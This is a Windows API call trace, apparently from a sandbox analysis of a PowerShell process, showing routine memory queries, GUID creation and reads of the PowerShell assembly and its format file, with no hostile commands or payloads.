	[0062.713] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.713] GetLastError () returned 0x0
	[0062.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.713] GetLastError () returned 0x0
	[0062.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.713] GetLastError () returned 0x0
	[0062.713] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.714] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.714] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.714] GetLastError () returned 0x0
	[0062.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.715] GetLastError () returned 0x0
	[0062.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.715] GetLastError () returned 0x0
	[0062.715] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.715] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.715] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.716] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.716] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.716] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.716] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.717] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.717] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.717] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.718] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.718] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.718] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.718] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.718] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.719] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x47ff4929, Data2=0x5cab, Data3=0x4579, Data4=([0]=0xb5, [1]=0xa1, [2]=0x7d, [3]=0xd2, [4]=0x35, [5]=0x31, [6]=0xd4, [7]=0x4d))) returned 0x0
	[0062.719] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.719] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.720] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.720] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.720] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.720] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.720] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.721] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.721] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.721] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.721] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.722] VirtualQuery (in: lpAddress=0xad354, lpBuffer=0xae354, dwLength=0x1c | out: lpBuffer=0xae354*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.722] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.722] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.722] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.723] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.723] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.723] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.723] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.724] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.724] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4dd49648, Data2=0x54e7, Data3=0x4073, Data4=([0]=0xae, [1]=0x37, [2]=0x70, [3]=0x63, [4]=0xe, [5]=0xa0, [6]=0x58, [7]=0x52))) returned 0x0
	[0062.724] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.724] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.725] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.725] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.725] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.725] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.725] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.726] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.726] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.726] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.726] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.726] VirtualQuery (in: lpAddress=0xad1cc, lpBuffer=0xae1cc, dwLength=0x1c | out: lpBuffer=0xae1cc*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.727] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.727] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.727] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.727] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.728] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xf9b0001, Data2=0x74c9, Data3=0x4db7, Data4=([0]=0x93, [1]=0xa2, [2]=0x91, [3]=0x34, [4]=0x4, [5]=0xc4, [6]=0xae, [7]=0x1a))) returned 0x0
	[0062.728] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xf1ef3e93, Data2=0xf9a0, Data3=0x4d10, Data4=([0]=0xaa, [1]=0x9e, [2]=0xca, [3]=0xe4, [4]=0xbd, [5]=0x44, [6]=0x20, [7]=0x2c))) returned 0x0
	[0062.728] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7337ce76, Data2=0xebef, Data3=0x4207, Data4=([0]=0xb7, [1]=0x7d, [2]=0xe2, [3]=0xea, [4]=0x2, [5]=0x9c, [6]=0x16, [7]=0x4d))) returned 0x0
	[0062.728] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x97f7d1c4, Data2=0xf40f, Data3=0x4bbd, Data4=([0]=0x9a, [1]=0x64, [2]=0xc2, [3]=0xf5, [4]=0x7f, [5]=0xf3, [6]=0xd3, [7]=0x27))) returned 0x0
	[0062.729] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xb078e593, Data2=0x62a2, Data3=0x4c81, Data4=([0]=0xb6, [1]=0x15, [2]=0x2a, [3]=0x9, [4]=0xd3, [5]=0x53, [6]=0x82, [7]=0xce))) returned 0x0
	[0062.729] VirtualQuery (in: lpAddress=0xad25c, lpBuffer=0xae25c, dwLength=0x1c | out: lpBuffer=0xae25c*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.729] VirtualQuery (in: lpAddress=0xad298, lpBuffer=0xae298, dwLength=0x1c | out: lpBuffer=0xae298*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.730] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x8b46625d, Data2=0xf26b, Data3=0x445e, Data4=([0]=0x9e, [1]=0x8a, [2]=0x7a, [3]=0x6e, [4]=0x30, [5]=0xea, [6]=0x9f, [7]=0x15))) returned 0x0
	[0062.730] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4dc6eeea, Data2=0x62b5, Data3=0x4c0e, Data4=([0]=0xbd, [1]=0x74, [2]=0x4d, [3]=0x11, [4]=0xd0, [5]=0xbf, [6]=0x3, [7]=0x35))) returned 0x0
	[0062.730] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x93feb6ba, Data2=0x55d6, Data3=0x4aca, Data4=([0]=0xbc, [1]=0x2e, [2]=0x91, [3]=0x58, [4]=0x2f, [5]=0x55, [6]=0x57, [7]=0xd1))) returned 0x0
	[0062.730] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.730] GetLastError () returned 0x0
	[0062.731] GetFileType (hFile=0x2fc) returned 0x1
	[0062.731] SetErrorMode (uMode=0x1) returned 0x1
	[0062.731] GetFileType (hFile=0x2fc) returned 0x1
	[0062.731] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.732] GetLastError () returned 0x0
	[0062.732] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.732] GetLastError () returned 0x0
	[0062.732] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.732] GetLastError () returned 0x0
	[0062.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.733] GetLastError () returned 0x0
	[0062.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.733] GetLastError () returned 0x0
	[0062.733] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.734] GetLastError () returned 0x0
	[0062.734] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.734] GetLastError () returned 0x0
	[0062.734] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.734] GetLastError () returned 0x0
	[0062.734] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.734] GetLastError () returned 0x0
	[0062.735] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.735] GetLastError () returned 0x0
